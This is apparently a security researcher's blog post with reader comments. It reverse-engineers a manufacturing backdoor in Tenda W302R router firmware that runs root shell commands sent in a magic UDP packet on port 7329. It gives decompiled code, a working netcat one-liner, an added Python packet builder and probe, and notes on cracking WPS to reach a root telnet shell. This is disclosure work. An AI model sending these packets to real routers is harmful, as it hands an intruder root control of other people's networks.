From China, With Love

Lest anyone think that D-Link is the only vendor who puts backdoors in their products, here’s one that can be exploited with a single UDP packet, courtesy of Tenda.

After extracting the latest firmware for Tenda’s W302R wireless router, I started looking at /bin/httpd, which turned out to be the GoAhead webserver:

Server header string in /bin/httpd

But Tenda has made a lot of special modifications themselves. Just before entering the HTTP receive loop, main calls InitMfgTask, which spawns the MfgThread function as a separate thread:

pthread_create(&var_10, 0, MfgThread, 0);

Hmmm…InitMfgTask and MfgThread? Related to manufacturing tasks perhaps? Iiiiiinteresting…

The first thing MfgThread does is create a UDP socket and bind it to port 7329:

Create UDP socket and bind to port 7329

The thread then goes into a recvfrom loop, reading up to 128 bytes from the socket. It expects each received UDP packet to be at least 14 bytes in length:

Read packet from socket and check packet size

Now for the fun part; the received UDP packet is then parsed by this block of code:

Processing the received packet

In C, this code reads (rx_buf is the 128-byte receive buffer, rx_size the number of bytes received; the offsets follow the packet layout shown below):

memset(rx_magic_string, 0, 0x80);
memset(command_byte, 0, 0x80);
memset(command_arg, 0, 0x80);

memcpy(rx_magic_string, rx_buf, 9);          // 9-byte magic, NUL-terminated by the memset above
command_byte[0] = rx_buf[10];                // single command byte after the magic's NUL
memcpy(command_arg, rx_buf+11, rx_size-11);  // the rest of the packet (at most 117 bytes) is the argument

// If magic string doesn't match, stop processing this packet and wait for another packet
if(strcmp(rx_magic_string, "w302r_mfg") != 0) goto outer_receive_loop;

We can see that the thread is expecting a packet with the following structure:

struct command_packet_t
{
    char magic[10];        // 9 byte magic string ("w302r_mfg"), plus a NULL terminating byte
    char command_byte;
    char command_arg[117];
};

As long as the received packet starts with the string “w302r_mfg”, the code then compares the specified command byte against three ASCII characters (‘1’, ‘x’, and ‘e’):

Comparing command_byte to '1', 'x' and 'e'

For simplicity, I’ve converted the remaining disassembly (at least the important bits) to the following C code:

switch(command_byte[0])
{
    case 'e':   // ping test: reply with the magic string
        strcpy(tx_buf, "w302r_mfg");
        tx_size = 9;
        break;
    case '1':   // meant for iwpriv, but strstr() only requires the substring to be present
        if(strstr(command_arg, "iwpriv") != NULL)
        {
            tx_size = call_shell(command_arg, tx_buf, 0x800);
        }
        else
        {
            strcpy(tx_buf, "000000");
            tx_size = strlen(tx_buf);
        }
        break;
    case 'x':   // run any command, as root
        tx_size = call_shell(command_arg, tx_buf, 0x800);
        break;
    default:    // unrecognised command byte: no reply at all
        goto outer_receive_loop;
}

sendto(client_socket, tx_buf, tx_size, 0, client_sock_addr, 16);
goto outer_receive_loop;

The following actions correspond to the three accepted command bytes:

  • ‘e’ – Responds with a pre-defined string, basically a ping test
  • ‘1’ – Intended to allow you to run iwpriv commands
  • ‘x’ – Allows you to run any command, as root

If ‘x’ is specified as the command byte, the remainder of the packet after the command byte (called command_arg in the above code) is passed to call_shell, which executes it via popen, i.e. through the shell, as the root user httpd runs as:

popen(command_arg, "r");

What’s more, call_shell populates the tx_buf buffer with the output from the command, which, as we can see from the previous C code, is sent back to the client!

Knowing the functionality of MfgThread and its expected packet structure, we can easily exercise this backdoor with netcat:

$ echo -ne "w302r_mfg\x00x/bin/ls" | nc -u -q 5 <router LAN IP> 7329
drwxr-xr-x    2 0        0            1363 webroot
drwxr-xr-x    1 0        0               0 var
drwxr-xr-x    5 0        0              43 usr
drwxr-xr-x    1 0        0               0 tmp
drwxr-xr-x    2 0        0               3 sys
drwxr-xr-x    2 0        0             569 sbin
dr-xr-xr-x   39 0        0               0 proc
drwxr-xr-x    2 0        0               3 mnt
drwxr-xr-x    1 0        0               0 media
drwxr-xr-x    4 0        0             821 lib
lrwxrwxrwx    1 0        0              11 init -> bin/busybox
drwxr-xr-x    2 0        0               3 home
drwxr-xr-x    7 0        0             154 etc_ro
drwxr-xr-x    1 0        0               0 etc
drwxr-xr-x    1 0        0               0 dev
drwxr-xr-x    2 1000     100           574 bin
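As an added example (not code from the original post or from Tenda's firmware), the following Python script covers both the packet layout and dispatch described above and the netcat exchange just shown: it builds and decodes datagrams in the command_packet_t layout, mirrors the switch on the command byte with a caller-supplied stand-in for call_shell, and pairs a probe that sends only the harmless 'e' ping with a loopback emulator that records what an 'x' packet would have executed instead of running it. The function names, the emulator and the probe are this example's own assumptions. Two details the C code implies are made explicit here: a bare 'e' ping is shorter than the 14-byte minimum and must be NUL-padded or the thread drops it, and because the '1' handler uses strstr, any command line that merely contains the substring "iwpriv" reaches the shell just like 'x'.

```python
"""Emulate and probe the w302r_mfg backdoor protocol described above.

Added example, not code from the original post or from Tenda's firmware: the
packet layout, 14-byte minimum, command bytes and replies come from the post;
the function names, the loopback emulator and the probe are assumptions.
"""
import socket
import threading

MAGIC = b"w302r_mfg"   # 9-byte magic string MfgThread strcmp()s against
PORT = 7329            # UDP port MfgThread binds on the LAN
MIN_LEN = 14           # shorter datagrams are dropped without a reply
MAX_LEN = 128          # recvfrom() reads at most this many bytes


def build_packet(command, arg=b"", magic=MAGIC):
    """Lay out a datagram as command_packet_t: magic, NUL, command byte, argument.
    A bare 'e' ping is 11 bytes, so it is NUL-padded to the 14-byte minimum."""
    if len(command) != 1:
        raise ValueError("command must be a single byte, e.g. b'x'")
    pkt = magic + b"\x00" + command + arg
    if len(pkt) > MAX_LEN:
        raise ValueError("packet exceeds the 128 bytes recvfrom() reads")
    return pkt.ljust(MIN_LEN, b"\x00")


def parse_packet(data, magic=MAGIC):
    """Decode a datagram the way MfgThread does: (command_byte, arg), or None
    where the thread ignores it. The magic is a fixed-length copy compared with
    strcmp(); the argument reaches popen() as a C string, so it ends at a NUL."""
    if len(data) < MIN_LEN or data[:len(magic)] != magic:
        return None
    off = len(magic) + 1                       # skip the magic and its NUL
    command = data[off:off + 1]
    arg = data[off + 1:MAX_LEN].split(b"\x00", 1)[0]
    return command, arg


def dispatch(command, arg, run_shell, magic=MAGIC):
    """Mirror the switch on the command byte; run_shell stands in for call_shell().
    Returns the bytes sent back, or None for an unknown byte (no reply at all)."""
    if command == b"e":
        return magic                           # ping test: echo the magic
    if command == b"1":
        if b"iwpriv" in arg:                   # strstr(): substring anywhere suffices
            return run_shell(arg)
        return b"000000"
    if command == b"x":
        return run_shell(arg)                  # any command, as root
    return None


def serve_one(sock, run_shell):
    """One pass of the receive loop, for an emulator or honeypot bound to sock."""
    data, peer = sock.recvfrom(MAX_LEN)
    parsed = parse_packet(data)
    if parsed is None:
        return None
    reply = dispatch(*parsed, run_shell)
    if reply is not None:
        sock.sendto(reply, peer)
    return parsed


def probe(host, port=PORT, timeout=2.0):
    """Send only the harmless 'e' ping; True if the host answers with the magic."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    try:
        sock.sendto(build_packet(b"e"), (host, port))
        reply, _ = sock.recvfrom(MAX_LEN)
    except socket.timeout:
        return False
    finally:
        sock.close()
    return reply == MAGIC


def loopback_demo():
    """Emulator on 127.0.0.1: answer a probe, then log (not run) an 'x' command.
    Returns (probe result, command lines the emulator was asked to run, last reply)."""
    captured = []
    def refuse(arg):                           # honeypot stand-in for call_shell()
        captured.append(arg)
        return b"refused\n"
    srv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    srv.bind(("127.0.0.1", 0))                 # ephemeral port instead of 7329
    port = srv.getsockname()[1]
    t = threading.Thread(target=lambda: [serve_one(srv, refuse) for _ in range(2)])
    t.start()
    found = probe("127.0.0.1", port)
    cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    cli.settimeout(2.0)
    cli.sendto(build_packet(b"x", b"/bin/ls"), ("127.0.0.1", port))
    reply, _ = cli.recvfrom(MAX_LEN)
    cli.close()
    t.join()
    srv.close()
    return found, captured, reply


if __name__ == "__main__":
    print(loopback_demo())
```

Running the file starts the emulator on an ephemeral loopback port, probes it, and sends one 'x' packet whose command line is captured rather than executed. Against real hardware, probe() on port 7329 is the safe check for whether a device on the LAN answers this protocol, since 'e' never touches call_shell; the magic parameter is there because the comments below note that the same code appears with a different magic string in other builds.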

One teensy-weensy, but ever so crucial little tiny detail is that the backdoor only listens on the LAN, thus it is not exploitable from the WAN. However, it is exploitable over the wireless network, which has WPS enabled by default with no brute force rate limiting. My shiny new ReaverPro box made relatively short work of cracking WPS, providing access to the WLAN and a subsequent root shell on the router (they also ship with a default WPA key, which you might want to try first):

ReaverPro cracking the WPS pin

Starting telnetd and getting a root shell

As the magic string suggests, this backdoor was likely first implemented in Tenda’s W302R router, although it also exists in the Tenda W330R, as well as re-branded models, such as the Medialink MWN-WAPR150N. They all use the same “w302r_mfg” magic packet string.


ea did a great job of grepping through various Tenda firmwares to find a lot more routers that are likely affected:


96 Responses to From China, With Love

  1. virusdefender says:

    it’s mysterious…

  2. monky says:

    Chinese device has backdoor in router. wow… amazing!!!!

  3. Pingback: Tenda router backdoor? | USA is China

  4. cong ty luat says:

    from china with love. :V

    • craig is a born again as$h0le says:

      from usa, with hate/slander/politically motivated highly biased bullshit articles. first of all, you still need to crack the wps pwd, so how the fuck is this a backdoor. second, this is the second time u’ve only targeted any hardware that is even remotely related to china. the first was d-link (actually taiwan based). there are hundres of routers out there with exploits, nice to know you only narrow your selection based on some seedy agenda.

  5. Preston says:

    Somehow, the source of this GoAhead was on github:

    Github record shows the repo was committed to github a year ago. It shows very clearly how the backdoor “MfgThread” works.

    I’ve no idea where the source comes from, maybe leaked from an engineer? I guess Tenda doesn’t intend to open-source their firmware.

    • Craig says:

      Yeah, I saw that too (after I RE’d the firmware of course :P). It’s common for vendors to not release the source to any of their custom/customized binaries, even if they have a GPL release; it isn’t clear why the code got uploaded to github though.

  6. Jobs says:

    I’m using f*** tenda wireless accesspoint…

    • Craig says:

      Well the good news is that the backdoor only listens on the LAN, so as long as you don’t have any untrusted users on your network and you disable WPS and use a strong WPA passphrase, you should be relatively safe.

    • Chinese Guy says:

      Are you telling me they will go near your house, check if your WPS is on, and sit there for several hours to crack the password just to spy on your unencrypted connections? Scaring your ISP to hand over your data is definitely more effective. This kind of obvious backdoor is more like the work of a newbie programmer who is cheap to hire, and wanted to test the firmware but forgot to remove it when releasing the firmware.

      • Craig says:

        I doubt this was a forgotten backdoor (though almost certainly the developers of these devices are newbies/cheap hires). Based on the function names alone this appears to be put in place intentionally for testing/debugging during manufacturing.

  7. ea says:

    Nice find, I grepped through the different firmwares on the Tenda website:

  8. Veronique says:

    F** China device !

  9. Pingback: Another backdoor in routers – a magic UDP packet is enough | Zaufana Trzecia Strona

  10. Benny says:

    Great work, congratulations to your success! :)

  11. Pingback: NeoAtlantis/NERV | [Repost] Tenda router backdoor gives root access

  12. Jack says:

    Well, We should boycott chinese devices immediately!

  13. shadowlips says:

    I think non-open-source devices are more dangerous nowadays, like Huawei routers and switches, ZTE devices. We can’t imagine it……

  14. Pingback: .:[ d4 n3wS ]:. » Tenda: a backdoor in Chinese routers

  15. Ahmed says:

    I’m just curious, what software are you using to do all amazing reversing engineering stuff?

  16. says:

    Hello, ~~~~~Seeking testing

  17. Ahmed says:

    This doesn’t work on MWN-WAPR150N router. I’ve just tested it.

    • Craig says:

      Is it an MWN-WAPR150N or an MWN-WAPR150Nv2? The firmware for the MWN-WAPR150Nv2 is radically different and does not contain this backdoor. I have confirmed that the latest firmware for the MWN-WAPR150N (v11.8 at the time of this writing) does in fact have this same backdoor.

      • Ahmed says:

        I’ve tested your exploit on MWN-WAPR150Nv2 firmware. So, you are correct.

        You did an amazing job reverse engineering their firmware. If you want to do another project, check out the Westell VersaLink 327W Verizon router. They released a firmware that opens a TCP port directly on the router, which cannot be closed.

        You can read about it here:

      • Ellie says:

        I’m wondering if this is the case for the MWN-WAPR300N? My phone’s been redirecting to fishy websites only when I’m on my home wifi. Several devices are connected and only my phone is affected so who knows. I just upgraded the firmware to the latest version, just wondering how I, a computer novice, can test whether I’m vulnerable?

  18. HD Moore says:

    The GitHub source linked by Preston uses a different magic string. This may be even more common, with different magics for each vendor:

    if (strcmp(FlagBuf, "rlink_mfg") != 0) {

    • Craig says:

      Interesting; I know that at least the W330R uses a Ralink chipset. It wouldn’t surprise me if this is code supplied by Ralink to vendors and Tenda just changed the magic string to their device’s model number.

  19. Pingback: Backdoor Found In D-Link Consumer Routers

  20. Pingback: A backdoor activated by a UDP packet has been found in Tenda and Medialink wireless routers | — All-Russian portal on UNIX systems

  21. Pingback: From China, With Love | Rocketboom

  22. Eric Wang says:

    In China, I think TP-Link is much better than D-Link and Tenda.
    Tenda is just rubbish; it’s not easy to use.
    TP-Link is much easier to use, but I am not sure whether it has a backdoor.

  23. muc in says:

    I’m using a TP-Link wireless access point

  24. Pingback: Backdoor in Chinese Tenda routers

  25. Pingback: Tenda router backdoor, From China, With Love! | Betula’s Blog

  26. NoArmsNoLegsInOcean says:

    I keep my key under the mat in the backyard.

  27. Criação says:

    Hi Craig… really nice work indeed. I envy your skills…
    One question: Are you able to use that 64-character-long WPA PSK key you got with Reaver? This is something that I was unable to solve in most cases.

    • Craig says:

      I don’t know if all affected devices do this, but the one I tested did give back a random 64 character key instead of the actual WPA key currently in use. The new Reaver has an option to disable wireless encryption once you know the WPS pin, which is what I used to get into the wireless network. It isn’t ideal, but most people would just think it was the router being buggy anyway, and even if they put another WPA key in place, uploading a backdoor to the router would let you keep access to the network.

  28. iddlebit says:

    Now might be a good time to mention OpenWRT

  29. Sally Zhang says:

    Does this router have the backdoor?
    No product seems to be safe now!

  30. Pingback: How to prevent a UDP-based channel from turning into a "backdoor"?CopyQuery CopyQuery | Question & Answer Tool for your Technical Queries,CopyQuery, ejjuit, query, copyquery,, android doubt, ios question, sql query, sqlite quer

  31. Pingback: Root access backdoor discovered in Chinese Tenda Wireless Routers

  32. Pingback: Approaching Science: From China, With Love – Analysis of the Tenda router backdoor | Panni_007 Security

  33. Pingback: Backdoor Found In Tenda Router Firmware | Mocana DeviceLine Blog

  34. ALIEN360 says:

    Hello, respect for the article. I can confirm that this backdoor doesn’t work on the W316R; I tried with 3 firmware versions, using both w302r_mfg and w316r_mfg. Maybe there are different strings for all models.

  35. Pingback: D-Link hole-prober finds 'backdoor' in Chinese wireless routers | Techbait Tech News

  36. Pingback: ste williams – D-Link hole-prober finds ‘backdoor’ in Chinese wireless routers

  37. Pingback: Tenda keeps D-Link Company | The Security Shelf

  38. Pingback: From China with love | Tibetan I Tech

  39. says:

    • Hang says:

      It is interesting that the low price of Chinese products is an excuse for the backdoor. The backdoor is an ethical issue rather than a cost issue. Is the last paragraph a threat? Do you think it works?

      This is really a unique way of reasoning of Chinese Communists.



      • says:

        If you use a knock-off phone and expect it to perform like an iPhone, that is impossible. Actually, what I want to say is that Tenda’s problem comes from it being a low-priced product for which they did not study the firmware properly; that is undeniably Tenda’s fault, but I understand it as: cheap goods are toys -_-! I think our ways of thinking differ a lot. For example: this Tenda is insecure, so you demand that Tenda replace the product! Whereas I use it as long as it works, and if it really is insecure I just go and buy another one myself.

  40. Pingback: Rotten routers? More brands found to contain hidden “backdoors” – Information security alerts and news

  41. Pingback: Router vulnerabilities: now also at Netgear and Tenda - Nerd-Supreme

  42. Pingback: IT Secure Site » Blog Archive » Rotten routers? More brands found to contain hidden “backdoors”

  43. Pingback: Tenda Wireless Routers Feature Backdoor | HOTforSecurity

  44. Pingback: Chinese Tenda routers hide a backdoor vulnerability | Network Security and Privacy

  45. Pingback: Repost: Chinese Tenda routers hide a backdoor vulnerability

  46. zucchini says:

    I have been having trouble unsquashing this filesystem…
    “SYNTAX: /usr/local/bin/unsquashfs [options] filesystem
    Decompressors available:

  47. Pingback: One Ping Only | TechSNAP 133 | Jupiter Broadcasting

  48. DS says:

    Worked on my Zonet/Tenda router(s). Only thing I found is that the telnetd actually asks for a username/password which I can’t find.

  49. Matrong says:

    Actually, Tenda just fixed it by uploading new patches. Gotta say, I kind of like Tenda; I’ve been using Tenda since 2009, had some issues on setup but great price and reliable, my W307R still works like a charm. I believe there are lots of folks like me who just don’t care about the brand that much, but I ain’t letting someone just talk trash about the brand I like just like that.

    Here is the link to their explanation:

  50. Pingback: Tenda router backdoor, From China, With Love! | sky'自留地

  51. Pingback: Security News #0×56 | CyberOperations

  52. Pingback: Tenda wireless router remote command execution backdoor vulnerability | Product Manager Commune

  53. Pingback: Chinese Tenda routers hide a backdoor vulnerability | Network Security and Privacy

  54. Pingback: ste williams – Tenda seals shut router backdoor found by D-Link hole-prober

  55. Pingback: Tenda seals shut router backdoor found by D-Link hole-prober | Techbait Tech News

  56. Pingback: Liquidmatrix Security Digest Podcast - Episode 34 - Liquidmatrix Security Digest Liquidmatrix Security Digest

  57. Pingback: Analysis of the Tenda router backdoor

  58. Pingback: PrimalSec Podcast Episode #3 ← Primal Security Podcast

  59. Pingback: How I found a vulnerability in Tenda router firmware | 天天三国杀

  60. Pingback: Root access backdoor discovered in Chinese Tenda Wireless Routers | Cyber Defense Magazine

  61. Pingback: Backdoor found in Chinese Tenda Wireless Routers, allows Root access to Hackers | My great WordPress blog

  62. Pingback: Intrusio Router backdoor reloaded…

  63. Pingback: Tenda and their backdoor in the W302R | Computer Support

  64. tel says:

    Given that this is not a WAN-side hole, this seems to me like good old human error being attributed (by some) to malice.

    Nice RE and write-up, I just have 2 suggestions:

    1) Mention that Tenda has subsequently apologised and issued fixed firmware:

    2) and perhaps you’d be kind enough to verify that their fix (a) fixes this hole, and (b) doesn’t introduce any others.

  65. Pingback: Tenda router backdoor, From China, With Love! | 写代码度日的骚年
